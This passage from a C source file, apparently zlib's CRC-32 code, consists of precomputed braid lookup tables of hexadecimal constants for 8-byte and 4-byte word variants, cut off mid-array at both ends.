0x68f04c5b00000000, 0x4059520300000000, 0x673c778200000000, 0xae37626100000000, 0x895247e000000000, 0xa1fb59b800000000, 0x869e7c3900000000, 0xf1a9640800000000, 0xd6cc418900000000, 0xfe655fd100000000, 0xd9007a5000000000, 0x2d7404cc00000000, 0x0a11214d00000000, 0x22b83f1500000000, 0x05dd1a9400000000, 0x72ea02a500000000, 0x558f272400000000, 0x7d26397c00000000, 0x5a431cfd00000000, 0x9348091e00000000, 0xb42d2c9f00000000, 0x9c8432c700000000, 0xbbe1174600000000, 0xccd60f7700000000, 0xebb32af600000000, 0xc31a34ae00000000, 0xe47f112f00000000, 0xdf0f656b00000000, 0xf86a40ea00000000, 0xd0c35eb200000000, 0xf7a67b3300000000, 0x8091630200000000, 0xa7f4468300000000, 0x8f5d58db00000000, 0xa8387d5a00000000, 0x613368b900000000, 0x46564d3800000000, 0x6eff536000000000, 0x499a76e100000000, 0x3ead6ed000000000, 0x19c84b5100000000, 0x3161550900000000, 0x1604708800000000, 0xe2700e1400000000, 0xc5152b9500000000, 0xedbc35cd00000000, 0xcad9104c00000000, 0xbdee087d00000000, 0x9a8b2dfc00000000, 0xb22233a400000000, 0x9547162500000000, 0x5c4c03c600000000, 0x7b29264700000000, 0x5380381f00000000, 0x74e51d9e00000000, 0x03d205af00000000, 0x24b7202e00000000, 0x0c1e3e7600000000, 0x2b7b1bf700000000, 0xa5f1b39500000000, 0x8294961400000000, 0xaa3d884c00000000, 0x8d58adcd00000000, 0xfa6fb5fc00000000, 0xdd0a907d00000000, 0xf5a38e2500000000, 0xd2c6aba400000000, 0x1bcdbe4700000000, 0x3ca89bc600000000, 0x1401859e00000000, 0x3364a01f00000000, 0x4453b82e00000000, 0x63369daf00000000, 0x4b9f83f700000000, 0x6cfaa67600000000, 0x988ed8ea00000000, 0xbfebfd6b00000000, 0x9742e33300000000, 0xb027c6b200000000, 0xc710de8300000000, 0xe075fb0200000000, 0xc8dce55a00000000, 0xefb9c0db00000000, 0x26b2d53800000000, 0x01d7f0b900000000, 0x297eeee100000000, 0x0e1bcb6000000000, 0x792cd35100000000, 0x5e49f6d000000000, 0x76e0e88800000000, 0x5185cd0900000000}}; #else /* W == 4 */ local const z_crc_t FAR crc_braid_table[][256] = { {0x00000000, 0x9ba54c6f, 0xec3b9e9f, 0x779ed2f0, 0x03063b7f, 0x98a37710, 0xef3da5e0, 0x7498e98f, 0x060c76fe, 0x9da93a91, 0xea37e861, 0x7192a40e, 0x050a4d81, 0x9eaf01ee, 0xe931d31e, 0x72949f71, 0x0c18edfc, 0x97bda193, 0xe0237363, 0x7b863f0c, 0x0f1ed683, 0x94bb9aec, 0xe325481c, 0x78800473, 0x0a149b02, 0x91b1d76d, 0xe62f059d, 0x7d8a49f2, 0x0912a07d, 0x92b7ec12, 0xe5293ee2, 0x7e8c728d, 0x1831dbf8, 0x83949797, 0xf40a4567, 0x6faf0908, 0x1b37e087, 0x8092ace8, 0xf70c7e18, 0x6ca93277, 0x1e3dad06, 0x8598e169, 0xf2063399, 0x69a37ff6, 0x1d3b9679, 0x869eda16, 0xf10008e6, 0x6aa54489, 0x14293604, 0x8f8c7a6b, 0xf812a89b, 0x63b7e4f4, 0x172f0d7b, 0x8c8a4114, 0xfb1493e4, 0x60b1df8b, 0x122540fa, 0x89800c95, 0xfe1ede65, 0x65bb920a, 0x11237b85, 0x8a8637ea, 0xfd18e51a, 0x66bda975, 0x3063b7f0, 0xabc6fb9f, 0xdc58296f, 0x47fd6500, 0x33658c8f, 0xa8c0c0e0, 0xdf5e1210, 0x44fb5e7f, 0x366fc10e, 0xadca8d61, 0xda545f91, 0x41f113fe, 0x3569fa71, 0xaeccb61e, 0xd95264ee, 0x42f72881, 0x3c7b5a0c, 0xa7de1663, 0xd040c493, 0x4be588fc, 0x3f7d6173, 0xa4d82d1c, 0xd346ffec, 0x48e3b383, 0x3a772cf2, 0xa1d2609d, 0xd64cb26d, 0x4de9fe02, 0x3971178d, 0xa2d45be2, 0xd54a8912, 0x4eefc57d, 0x28526c08, 0xb3f72067, 0xc469f297, 0x5fccbef8, 0x2b545777, 0xb0f11b18, 0xc76fc9e8, 0x5cca8587, 0x2e5e1af6, 0xb5fb5699, 0xc2658469, 0x59c0c806, 0x2d582189, 0xb6fd6de6, 0xc163bf16, 0x5ac6f379, 0x244a81f4, 0xbfefcd9b, 0xc8711f6b, 0x53d45304, 0x274cba8b, 0xbce9f6e4, 0xcb772414, 0x50d2687b, 0x2246f70a, 0xb9e3bb65, 0xce7d6995, 0x55d825fa, 0x2140cc75, 0xbae5801a, 0xcd7b52ea, 0x56de1e85, 0x60c76fe0, 0xfb62238f, 0x8cfcf17f, 0x1759bd10, 0x63c1549f, 0xf86418f0, 0x8ffaca00, 0x145f866f, 0x66cb191e, 0xfd6e5571, 0x8af08781, 0x1155cbee, 0x65cd2261, 0xfe686e0e, 0x89f6bcfe, 0x1253f091, 0x6cdf821c, 0xf77ace73, 0x80e41c83, 0x1b4150ec, 0x6fd9b963, 0xf47cf50c, 0x83e227fc, 0x18476b93, 0x6ad3f4e2, 0xf176b88d, 0x86e86a7d, 0x1d4d2612, 0x69d5cf9d, 0xf27083f2, 0x85ee5102, 0x1e4b1d6d, 0x78f6b418, 0xe353f877, 0x94cd2a87, 0x0f6866e8, 0x7bf08f67, 0xe055c308, 0x97cb11f8, 0x0c6e5d97, 0x7efac2e6, 0xe55f8e89, 0x92c15c79, 0x09641016, 0x7dfcf999, 0xe659b5f6, 0x91c76706, 0x0a622b69, 0x74ee59e4, 0xef4b158b, 0x98d5c77b, 0x03708b14, 0x77e8629b, 0xec4d2ef4, 0x9bd3fc04, 0x0076b06b, 0x72e22f1a, 0xe9476375, 0x9ed9b185, 0x057cfdea, 0x71e41465, 0xea41580a, 0x9ddf8afa, 0x067ac695, 0x50a4d810, 0xcb01947f, 0xbc9f468f, 0x273a0ae0, 0x53a2e36f, 0xc807af00, 0xbf997df0, 0x243c319f, 0x56a8aeee, 0xcd0de281, 0xba933071, 0x21367c1e, 0x55ae9591, 0xce0bd9fe, 0xb9950b0e, 0x22304761, 0x5cbc35ec, 0xc7197983, 0xb087ab73, 0x2b22e71c, 0x5fba0e93, 0xc41f42fc, 0xb381900c, 0x2824dc63, 0x5ab04312, 0xc1150f7d, 0xb68bdd8d, 0x2d2e91e2, 0x59b6786d, 0xc2133402, 0xb58de6f2, 0x2e28aa9d, 0x489503e8, 0xd3304f87, 0xa4ae9d77, 0x3f0bd118, 0x4b933897, 0xd03674f8, 0xa7a8a608, 0x3c0dea67, 0x4e997516, 0xd53c3979, 0xa2a2eb89, 0x3907a7e6, 0x4d9f4e69, 0xd63a0206, 0xa1a4d0f6, 0x3a019c99, 0x448dee14, 0xdf28a27b, 0xa8b6708b, 0x33133ce4, 0x478bd56b, 0xdc2e9904, 0xabb04bf4, 0x3015079b, 0x428198ea, 0xd924d485, 0xaeba0675, 0x351f4a1a, 0x4187a395, 0xda22effa, 0xadbc3d0a, 0x36197165}, {0x00000000, 0xc18edfc0, 0x586cb9c1, 0x99e26601, 0xb0d97382, 0x7157ac42, 0xe8b5ca43, 0x293b1583, 0xbac3e145, 0x7b4d3e85, 0xe2af5884, 0x23218744, 0x0a1a92c7, 0xcb944d07, 0x52762b06, 0x93f8f4c6, 0xaef6c4cb, 0x6f781b0b, 0xf69a7d0a, 0x3714a2ca, 0x1e2fb749, 0xdfa16889, 0x46430e88, 0x87cdd148, 0x1435258e, 0xd5bbfa4e, 0x4c599c4f, 0x8dd7438f, 0xa4ec560c, 0x656289cc, 0xfc80efcd, 0x3d0e300d, 0x869c8fd7, 0x47125017, 0xdef03616, 0x1f7ee9d6, 0x3645fc55, 0xf7cb2395, 0x6e294594, 0xafa79a54, 0x3c5f6e92, 0xfdd1b152, 0x6433d753, 0xa5bd0893, 0x8c861d10, 0x4d08c2d0, 0xd4eaa4d1, 0x15647b11, 0x286a4b1c, 0xe9e494dc, 0x7006f2dd, 0xb1882d1d, 0x98b3389e, 0x593de75e, 0xc0df815f, 0x01515e9f, 0x92a9aa59, 0x53277599, 0xcac51398, 0x0b4bcc58, 0x2270d9db, 0xe3fe061b, 0x7a1c601a, 0xbb92bfda, 0xd64819ef, 0x17c6c62f, 0x8e24a02e, 0x4faa7fee, 0x66916a6d, 0xa71fb5ad, 0x3efdd3ac, 0xff730c6c, 0x6c8bf8aa, 0xad05276a, 0x34e7416b, 0xf5699eab, 0xdc528b28, 0x1ddc54e8, 0x843e32e9, 0x45b0ed29, 0x78bedd24, 0xb93002e4, 0x20d264e5, 0xe15cbb25, 0xc867aea6, 0x09e97166, 0x900b1767, 0x5185c8a7, 0xc27d3c61, 0x03f3e3a1, 0x9a1185a0, 0x5b9f5a60, 0x72a44fe3, 0xb32a9023, 0x2ac8f622, 0xeb4629e2, 0x50d49638, 0x915a49f8, 0x08b82ff9, 0xc936f039, 0xe00de5ba, 0x21833a7a, 0xb8615c7b, 0x79ef83bb, 0xea17777d, 0x2b99a8bd, 0xb27bcebc, 0x73f5117c, 0x5ace04ff, 0x9b40db3f, 0x02a2bd3e, 0xc32c62fe, 0xfe2252f3, 0x3fac8d33, 0xa64eeb32, 0x67c034f2, 0x4efb2171, 0x8f75feb1, 0x169798b0, 0xd7194770, 0x44e1b3b6, 0x856f6c76, 0x1c8d0a77, 0xdd03d5b7, 0xf438c034, 0x35b61ff4, 0xac5479f5, 0x6ddaa635, 0x77e1359f, 0xb66fea5f, 0x2f8d8c5e, 0xee03539e, 0xc738461d, 0x06b699dd, 0x9f54ffdc, 0x5eda201c, 0xcd22d4da, 0x0cac0b1a, 0x954e6d1b, 0x54c0b2db, 0x7dfba758, 0xbc757898, 0x25971e99, 0xe419c159, 0xd917f154, 0x18992e94, 0x817b4895, 0x40f59755, 0x69ce82d6, 0xa8405d16, 0x31a23b17, 0xf02ce4d7, 0x63d41011, 0xa25acfd1, 0x3bb8a9d0, 0xfa367610, 0xd30d6393, 0x1283bc53, 0x8b61da52, 0x4aef0592, 0xf17dba48, 0x30f36588, 0xa9110389, 0x689fdc49, 0x41a4c9ca, 0x802a160a, 0x19c8700b, 0xd846afcb, 0x4bbe5b0d, 0x8a3084cd, 0x13d2e2cc, 0xd25c3d0c, 0xfb67288f, 0x3ae9f74f, 0xa30b914e, 0x62854e8e, 0x5f8b7e83, 0x9e05a143, 0x07e7c742, 0xc6691882, 0xef520d01, 0x2edcd2c1, 0xb73eb4c0, 0x76b06b00, 0xe5489fc6, 0x24c64006, 0xbd242607, 0x7caaf9c7, 0x5591ec44, 0x941f3384, 0x0dfd5585, 0xcc738a45, 0xa1a92c70, 0x6027f3b0, 0xf9c595b1, 0x384b4a71, 0x11705ff2, 0xd0fe8032, 0x491ce633, 0x889239f3, 0x1b6acd35, 0xdae412f5, 0x430674f4, 0x8288ab34, 0xabb3beb7, 0x6a3d6177, 0xf3df0776, 0x3251d8b6, 0x0f5fe8bb, 0xced1377b, 0x5733517a, 0x96bd8eba, 0xbf869b39, 0x7e0844f9, 0xe7ea22f8, 0x2664fd38, 0xb59c09fe, 0x7412d63e, 0xedf0b03f, 0x2c7e6fff, 0x05457a7c, 0xc4cba5bc, 0x5d29c3bd, 0x9ca71c7d, 0x2735a3a7, 0xe6bb7c67, 0x7f591a66, 0xbed7c5a6, 0x97ecd025, 0x56620fe5, 0xcf8069e4, 0x0e0eb624, 0x9df642e2, 0x5c789d22, 0xc59afb23, 0x041424e3, 0x2d2f3160, 0xeca1eea0, 0x754388a1, 0xb4cd5761, 0x89c3676c, 0x484db8ac, 0xd1afdead, 0x1021016d, 0x391a14ee, 0xf894cb2e, 0x6176ad2f, 0xa0f872ef, 0x33008629, 0xf28e59e9, 0x6b6c3fe8, 0xaae2e028, 0x83d9f5ab, 0x42572a6b, 0xdbb54c6a, 0x1a3b93aa}, {0x00000000, 0xefc26b3e, 0x04f5d03d, 0xeb37bb03, 0x09eba07a, 0xe629cb44, 0x0d1e7047, 0xe2dc1b79, 0x13d740f4, 0xfc152bca, 0x172290c9, 0xf8e0fbf7, 0x1a3ce08e, 0xf5fe8bb0, 0x1ec930b3, 0xf10b5b8d, 0x27ae81e8, 0xc86cead6, 0x235b51d5, 0xcc993aeb, 0x2e452192, 0xc1874aac, 0x2ab0f1af, 0xc5729a91, 0x3479c11c, 0xdbbbaa22, 0x308c1121, 0xdf4e7a1f, 0x3d926166, 0xd2500a58, 0x3967b15b, 0xd6a5da65, 0x4f5d03d0, 0xa09f68ee, 0x4ba8d3ed, 0xa46ab8d3, 0x46b6a3aa, 0xa974c894, 0x42437397, 0xad8118a9, 0x5c8a4324, 0xb348281a, 0x587f9319, 0xb7bdf827, 0x5561e35e, 0xbaa38860, 0x51943363, 0xbe56585d, 0x68f38238, 0x8731e906, 0x6c065205, 0x83c4393b, 0x61182242, 0x8eda497c, 0x65edf27f, 0x8a2f9941, 0x7b24c2cc, 0x94e6a9f2, 0x7fd112f1, 0x901379cf, 0x72cf62b6, 0x9d0d0988, 0x763ab28b, 0x99f8d9b5, 0x9eba07a0, 0x71786c9e, 0x9a4fd79d, 0x758dbca3, 0x9751a7da, 0x7893cce4, 0x93a477e7, 0x7c661cd9, 0x8d6d4754, 0x62af2c6a, 0x89989769, 0x665afc57, 0x8486e72e, 0x6b448c10, 0x80733713, 0x6fb15c2d, 0xb9148648, 0x56d6ed76, 0xbde15675, 0x52233d4b, 0xb0ff2632, 0x5f3d4d0c, 0xb40af60f, 0x5bc89d31, 0xaac3c6bc, 0x4501ad82, 0xae361681, 0x41f47dbf, 0xa32866c6, 0x4cea0df8, 0xa7ddb6fb, 0x481fddc5, 0xd1e70470, 0x3e256f4e, 0xd512d44d, 0x3ad0bf73, 0xd80ca40a, 0x37cecf34, 0xdcf97437, 0x333b1f09, 0xc2304484, 0x2df22fba, 0xc6c594b9, 0x2907ff87, 0xcbdbe4fe, 0x24198fc0, 0xcf2e34c3, 0x20ec5ffd, 0xf6498598, 0x198beea6, 0xf2bc55a5, 0x1d7e3e9b, 0xffa225e2, 0x10604edc, 0xfb57f5df, 0x14959ee1, 0xe59ec56c, 0x0a5cae52, 0xe16b1551, 0x0ea97e6f, 0xec756516, 0x03b70e28, 0xe880b52b, 0x0742de15, 0xe6050901, 0x09c7623f, 0xe2f0d93c, 0x0d32b202, 0xefeea97b, 0x002cc245, 0xeb1b7946, 0x04d91278, 0xf5d249f5, 0x1a1022cb, 0xf12799c8, 0x1ee5f2f6, 0xfc39e98f, 0x13fb82b1, 0xf8cc39b2, 0x170e528c, 0xc1ab88e9, 0x2e69e3d7, 0xc55e58d4, 0x2a9c33ea, 0xc8402893, 0x278243ad, 0xccb5f8ae, 0x23779390, 0xd27cc81d, 0x3dbea323, 0xd6891820, 0x394b731e, 0xdb976867, 0x34550359, 0xdf62b85a, 0x30a0d364, 0xa9580ad1, 0x469a61ef, 0xadaddaec, 0x426fb1d2, 0xa0b3aaab, 0x4f71c195, 0xa4467a96, 0x4b8411a8, 0xba8f4a25, 0x554d211b, 0xbe7a9a18, 0x51b8f126, 0xb364ea5f, 0x5ca68161, 0xb7913a62, 0x5853515c, 0x8ef68b39, 0x6134e007, 0x8a035b04, 0x65c1303a, 0x871d2b43, 0x68df407d, 0x83e8fb7e, 0x6c2a9040, 0x9d21cbcd, 0x72e3a0f3, 0x99d41bf0, 0x761670ce, 0x94ca6bb7, 0x7b080089, 0x903fbb8a, 0x7ffdd0b4, 0x78bf0ea1, 0x977d659f, 0x7c4ade9c, 0x9388b5a2, 0x7154aedb, 0x9e96c5e5, 0x75a17ee6, 0x9a6315d8, 0x6b684e55, 0x84aa256b, 0x6f9d9e68, 0x805ff556, 0x6283ee2f, 0x8d418511, 0x66763e12, 0x89b4552c, 0x5f118f49, 0xb0d3e477, 0x5be45f74, 0xb426344a, 0x56fa2f33, 0xb938440d, 0x520fff0e, 0xbdcd9430, 0x4cc6cfbd, 0xa304a483, 0x48331f80, 0xa7f174be, 0x452d6fc7, 0xaaef04f9, 0x41d8bffa, 0xae1ad4c4, 0x37e20d71, 0xd820664f, 0x3317dd4c, 0xdcd5b672, 0x3e09ad0b, 0xd1cbc635, 0x3afc7d36, 0xd53e1608, 0x24354d85, 0xcbf726bb, 0x20c09db8, 0xcf02f686, 0x2ddeedff, 0xc21c86c1, 0x292b3dc2, 0xc6e956fc, 0x104c8c99, 0xff8ee7a7, 0x14b95ca4, 0xfb7b379a, 0x19a72ce3, 0xf66547dd, 0x1d52fcde, 0xf29097e0, 0x039bcc6d, 0xec59a753, 0x076e1c50, 0xe8ac776e, 0x0a706c17, 0xe5b20729, 0x0e85bc2a, 0xe147d714}, {0x00000000, 0x177b1443, 0x2ef62886, 0x398d3cc5, 0x5dec510c, 0x4a97454f, 0x731a798a, 0x64616dc9, 0xbbd8a218, 0xaca3b65b, 0x952e8a9e, 0x82559edd, 0xe634f314, 0xf14fe757, 0xc8c2db92, 0xdfb9cfd1, 0xacc04271, 0xbbbb5632, 0x82366af7, 0x954d7eb4, 0xf12c137d, 0xe657073e, 0xdfda3bfb, 0xc8a12fb8, 0x1718e069, 0x0063f42a, 0x39eec8ef, 0x2e95dcac, 0x4af4b165, 0x5d8fa526, 0x640299e3, 0x73798da0, 0x82f182a3, 0x958a96e0, 0xac07aa25, 0xbb7cbe66, 0xdf1dd3af, 0xc866c7ec, 0xf1ebfb29, 0xe690ef6a, 0x392920bb, 0x2e5234f8, 0x17df083d, 0x00a41c7e, 0x64c571b7, 0x73be65f4, 0x4a335931, 0x5d484d72, 0x2e31c0d2, 0x394ad491, 0x00c7e854, 0x17bcfc17, 0x73dd91de, 0x64a6859d, 0x5d2bb958, 0x4a50ad1b, 0x95e962ca, 0x82927689, 0xbb1f4a4c, 0xac645e0f, 0xc80533c6, 0xdf7e2785, 0xe6f31b40, 0xf1880f03, 0xde920307, 0xc9e91744, 0xf0642b81, 0xe71f3fc2, 0x837e520b, 0x94054648, 0xad887a8d, 0xbaf36ece, 0x654aa11f, 0x7231b55c, 0x4bbc8999, 0x5cc79dda, 0x38a6f013, 0x2fdde450, 0x1650d895, 0x012bccd6, 0x72524176, 0x65295535, 0x5ca469f0, 0x4bdf7db3, 0x2fbe107a, 0x38c50439, 0x014838fc, 0x16332cbf, 0xc98ae36e, 0xdef1f72d, 0xe77ccbe8, 0xf007dfab, 0x9466b262, 0x831da621, 0xba909ae4, 0xadeb8ea7, 0x5c6381a4, 0x4b1895e7, 0x7295a922, 0x65eebd61, 0x018fd0a8, 0x16f4c4eb, 0x2f79f82e, 0x3802ec6d, 0xe7bb23bc, 0xf0c037ff, 0xc94d0b3a, 0xde361f79, 0xba5772b0, 0xad2c66f3, 0x94a15a36, 0x83da4e75, 0xf0a3c3d5, 0xe7d8d796, 0xde55eb53, 0xc92eff10, 0xad4f92d9, 0xba34869a, 0x83b9ba5f, 0x94c2ae1c, 0x4b7b61cd, 0x5c00758e, 0x658d494b, 0x72f65d08, 0x169730c1, 0x01ec2482, 0x38611847, 0x2f1a0c04, 0x6655004f, 0x712e140c, 0x48a328c9, 0x5fd83c8a, 0x3bb95143, 0x2cc24500, 0x154f79c5, 0x02346d86, 0xdd8da257, 0xcaf6b614, 0xf37b8ad1, 0xe4009e92, 0x8061f35b, 0x971ae718, 0xae97dbdd, 0xb9eccf9e, 0xca95423e, 0xddee567d, 0xe4636ab8, 0xf3187efb, 0x97791332, 0x80020771, 0xb98f3bb4, 0xaef42ff7, 0x714de026, 0x6636f465, 0x5fbbc8a0, 0x48c0dce3, 0x2ca1b12a, 0x3bdaa569, 0x025799ac, 0x152c8def, 0xe4a482ec, 0xf3df96af, 0xca52aa6a, 0xdd29be29, 0xb948d3e0, 0xae33c7a3, 0x97befb66, 0x80c5ef25, 0x5f7c20f4, 0x480734b7, 0x718a0872, 0x66f11c31, 0x029071f8, 0x15eb65bb, 0x2c66597e, 0x3b1d4d3d, 0x4864c09d, 0x5f1fd4de, 0x6692e81b, 0x71e9fc58, 0x15889191, 0x02f385d2, 0x3b7eb917, 0x2c05ad54, 0xf3bc6285, 0xe4c776c6, 0xdd4a4a03, 0xca315e40, 0xae503389, 0xb92b27ca, 0x80a61b0f, 0x97dd0f4c, 0xb8c70348, 0xafbc170b, 0x96312bce, 0x814a3f8d, 0xe52b5244, 0xf2504607, 0xcbdd7ac2, 0xdca66e81, 0x031fa150, 0x1464b513, 0x2de989d6, 0x3a929d95, 0x5ef3f05c, 0x4988e41f, 0x7005d8da, 0x677ecc99, 0x14074139, 0x037c557a, 0x3af169bf, 0x2d8a7dfc, 0x49eb1035, 0x5e900476, 0x671d38b3, 0x70662cf0, 0xafdfe321, 0xb8a4f762, 0x8129cba7, 0x9652dfe4, 0xf233b22d, 0xe548a66e, 0xdcc59aab, 0xcbbe8ee8, 0x3a3681eb, 0x2d4d95a8, 0x14c0a96d, 0x03bbbd2e, 0x67dad0e7, 0x70a1c4a4, 0x492cf861, 0x5e57ec22, 0x81ee23f3, 0x969537b0, 0xaf180b75, 0xb8631f36, 0xdc0272ff, 0xcb7966bc, 0xf2f45a79, 0xe58f4e3a, 0x96f6c39a, 0x818dd7d9, 0xb800eb1c, 0xaf7bff5f, 0xcb1a9296, 0xdc6186d5, 0xe5ecba10, 0xf297ae53, 0x2d2e6182, 0x3a5575c1, 0x03d84904, 0x14a35d47, 0x70c2308e, 0x67b924cd, 0x5e341808, 0x494f0c4b}}; local const z_word_t FAR crc_braid_big_table[][256] = { {0x00000000, 0x43147b17, 0x8628f62e, 0xc53c8d39, 0x0c51ec5d, 0x4f45974a, 0x8a791a73, 0xc96d6164, 0x18a2d8bb, 0x5bb6a3ac, 0x9e8a2e95, 0xdd9e5582, 0x14f334e6, 0x57e74ff1, 0x92dbc2c8, 0xd1cfb9df, 0x7142c0ac, 0x3256bbbb, 0xf76a3682, 0xb47e4d95, 0x7d132cf1, 0x3e0757e6, 0xfb3bdadf, 0xb82fa1c8, 0x69e01817, 0x2af46300, 0xefc8ee39, 0xacdc952e, 0x65b1f44a, 0x26a58f5d, 0xe3990264, 0xa08d7973, 0xa382f182, 0xe0968a95, 0x25aa07ac, 0x66be7cbb, 0xafd31ddf, 0xecc766c8, 0x29fbebf1, 0x6aef90e6, 0xbb202939, 0xf834522e, 0x3d08df17, 0x7e1ca400, 0xb771c564, 0xf465be73, 0x3159334a, 0x724d485d, 0xd2c0312e, 0x91d44a39, 0x54e8c700, 0x17fcbc17, 0xde91dd73, 0x9d85a664, 0x58b92b5d, 0x1bad504a, 0xca62e995, 0x89769282, 0x4c4a1fbb, 0x0f5e64ac, 0xc63305c8, 0x85277edf, 0x401bf3e6, 0x030f88f1, 0x070392de, 0x4417e9c9, 0x812b64f0, 0xc23f1fe7, 0x0b527e83, 0x48460594, 0x8d7a88ad, 0xce6ef3ba, 0x1fa14a65, 0x5cb53172, 0x9989bc4b, 0xda9dc75c, 0x13f0a638, 0x50e4dd2f, 0x95d85016, 0xd6cc2b01, 0x76415272, 0x35552965, 0xf069a45c, 0xb37ddf4b, 0x7a10be2f, 0x3904c538, 0xfc384801, 0xbf2c3316, 0x6ee38ac9, 0x2df7f1de, 0xe8cb7ce7, 0xabdf07f0, 0x62b26694, 0x21a61d83, 0xe49a90ba, 0xa78eebad, 0xa481635c, 0xe795184b, 0x22a99572, 0x61bdee65, 0xa8d08f01, 0xebc4f416, 0x2ef8792f, 0x6dec0238, 0xbc23bbe7, 0xff37c0f0, 0x3a0b4dc9, 0x791f36de, 0xb07257ba, 0xf3662cad, 0x365aa194, 0x754eda83, 0xd5c3a3f0, 0x96d7d8e7, 0x53eb55de, 0x10ff2ec9, 0xd9924fad, 0x9a8634ba, 0x5fbab983, 0x1caec294, 0xcd617b4b, 0x8e75005c, 0x4b498d65, 0x085df672, 0xc1309716, 0x8224ec01, 0x47186138, 0x040c1a2f, 0x4f005566, 0x0c142e71, 0xc928a348, 0x8a3cd85f, 0x4351b93b, 0x0045c22c, 0xc5794f15, 0x866d3402, 0x57a28ddd, 0x14b6f6ca, 0xd18a7bf3, 0x929e00e4, 0x5bf36180, 0x18e71a97, 0xdddb97ae, 0x9ecfecb9, 0x3e4295ca, 0x7d56eedd, 0xb86a63e4, 0xfb7e18f3, 0x32137997, 0x71070280, 0xb43b8fb9, 0xf72ff4ae, 0x26e04d71, 0x65f43666, 0xa0c8bb5f, 0xe3dcc048, 0x2ab1a12c, 0x69a5da3b, 0xac995702, 0xef8d2c15, 0xec82a4e4, 0xaf96dff3, 0x6aaa52ca, 0x29be29dd, 0xe0d348b9, 0xa3c733ae, 0x66fbbe97, 0x25efc580, 0xf4207c5f, 0xb7340748, 0x72088a71, 0x311cf166, 0xf8719002, 0xbb65eb15, 0x7e59662c, 0x3d4d1d3b, 0x9dc06448, 0xded41f5f, 0x1be89266, 0x58fce971, 0x91918815, 0xd285f302, 0x17b97e3b, 0x54ad052c, 0x8562bcf3, 0xc676c7e4, 0x034a4add, 0x405e31ca, 0x893350ae, 0xca272bb9, 0x0f1ba680, 0x4c0fdd97, 0x4803c7b8, 0x0b17bcaf, 0xce2b3196, 0x8d3f4a81, 0x44522be5, 0x074650f2, 0xc27addcb, 0x816ea6dc, 0x50a11f03, 0x13b56414, 0xd689e92d, 0x959d923a, 0x5cf0f35e, 0x1fe48849, 0xdad80570, 0x99cc7e67, 0x39410714, 0x7a557c03, 0xbf69f13a, 0xfc7d8a2d, 0x3510eb49, 0x7604905e, 0xb3381d67, 0xf02c6670, 0x21e3dfaf, 0x62f7a4b8, 0xa7cb2981, 0xe4df5296, 0x2db233f2, 0x6ea648e5, 0xab9ac5dc, 0xe88ebecb, 0xeb81363a, 0xa8954d2d, 0x6da9c014, 0x2ebdbb03, 0xe7d0da67, 0xa4c4a170, 0x61f82c49, 0x22ec575e, 0xf323ee81, 0xb0379596, 0x750b18af, 0x361f63b8, 0xff7202dc, 0xbc6679cb, 0x795af4f2, 0x3a4e8fe5, 0x9ac3f696, 0xd9d78d81, 0x1ceb00b8, 0x5fff7baf, 0x96921acb, 0xd58661dc, 0x10baece5, 0x53ae97f2, 0x82612e2d, 0xc175553a, 0x0449d803, 0x475da314, 0x8e30c270, 0xcd24b967, 0x0818345e, 0x4b0c4f49}, {0x00000000, 0x3e6bc2ef, 0x3dd0f504, 0x03bb37eb, 0x7aa0eb09, 0x44cb29e6, 0x47701e0d, 0x791bdce2, 0xf440d713, 0xca2b15fc, 0xc9902217, 0xf7fbe0f8, 0x8ee03c1a, 0xb08bfef5, 0xb330c91e, 0x8d5b0bf1, 0xe881ae27, 0xd6ea6cc8, 0xd5515b23, 0xeb3a99cc, 0x9221452e, 0xac4a87c1, 0xaff1b02a, 0x919a72c5, 0x1cc17934, 0x22aabbdb, 0x21118c30, 0x1f7a4edf, 0x6661923d, 0x580a50d2, 0x5bb16739, 0x65daa5d6, 0xd0035d4f, 0xee689fa0, 0xedd3a84b, 0xd3b86aa4, 0xaaa3b646, 0x94c874a9, 0x97734342, 0xa91881ad, 0x24438a5c, 0x1a2848b3, 0x19937f58, 0x27f8bdb7, 0x5ee36155, 0x6088a3ba, 0x63339451, 0x5d5856be, 0x3882f368, 0x06e93187, 0x0552066c, 0x3b39c483, 0x42221861, 0x7c49da8e, 0x7ff2ed65, 0x41992f8a, 0xccc2247b, 0xf2a9e694, 0xf112d17f, 0xcf791390, 0xb662cf72, 0x88090d9d, 0x8bb23a76, 0xb5d9f899, 0xa007ba9e, 0x9e6c7871, 0x9dd74f9a, 0xa3bc8d75, 0xdaa75197, 0xe4cc9378, 0xe777a493, 0xd91c667c, 0x54476d8d, 0x6a2caf62, 0x69979889, 0x57fc5a66, 0x2ee78684, 0x108c446b, 0x13377380, 0x2d5cb16f, 0x488614b9, 0x76edd656, 0x7556e1bd, 0x4b3d2352, 0x3226ffb0, 0x0c4d3d5f, 0x0ff60ab4, 0x319dc85b, 0xbcc6c3aa, 0x82ad0145, 0x811636ae, 0xbf7df441, 0xc66628a3, 0xf80dea4c, 0xfbb6dda7, 0xc5dd1f48, 0x7004e7d1, 0x4e6f253e, 0x4dd412d5, 0x73bfd03a, 0x0aa40cd8, 0x34cfce37, 0x3774f9dc, 0x091f3b33, 0x844430c2, 0xba2ff22d, 0xb994c5c6, 0x87ff0729, 0xfee4dbcb, 0xc08f1924, 0xc3342ecf, 0xfd5fec20, 0x988549f6, 0xa6ee8b19, 0xa555bcf2, 0x9b3e7e1d, 0xe225a2ff, 0xdc4e6010, 0xdff557fb, 0xe19e9514, 0x6cc59ee5, 0x52ae5c0a, 0x51156be1, 0x6f7ea90e, 0x166575ec, 0x280eb703, 0x2bb580e8, 0x15de4207, 0x010905e6, 0x3f62c709, 0x3cd9f0e2, 0x02b2320d, 0x7ba9eeef, 0x45c22c00, 0x46791beb, 0x7812d904, 0xf549d2f5, 0xcb22101a, 0xc89927f1, 0xf6f2e51e, 0x8fe939fc, 0xb182fb13, 0xb239ccf8, 0x8c520e17, 0xe988abc1, 0xd7e3692e, 0xd4585ec5, 0xea339c2a, 0x932840c8, 0xad438227, 0xaef8b5cc, 0x90937723, 0x1dc87cd2, 0x23a3be3d, 0x201889d6, 0x1e734b39, 0x676897db, 0x59035534, 0x5ab862df, 0x64d3a030, 0xd10a58a9, 0xef619a46, 0xecdaadad, 0xd2b16f42, 0xabaab3a0, 0x95c1714f, 0x967a46a4, 0xa811844b, 0x254a8fba, 0x1b214d55, 0x189a7abe, 0x26f1b851, 0x5fea64b3, 0x6181a65c, 0x623a91b7, 0x5c515358, 0x398bf68e, 0x07e03461, 0x045b038a, 0x3a30c165, 0x432b1d87, 0x7d40df68, 0x7efbe883, 0x40902a6c, 0xcdcb219d, 0xf3a0e372, 0xf01bd499, 0xce701676, 0xb76bca94, 0x8900087b, 0x8abb3f90, 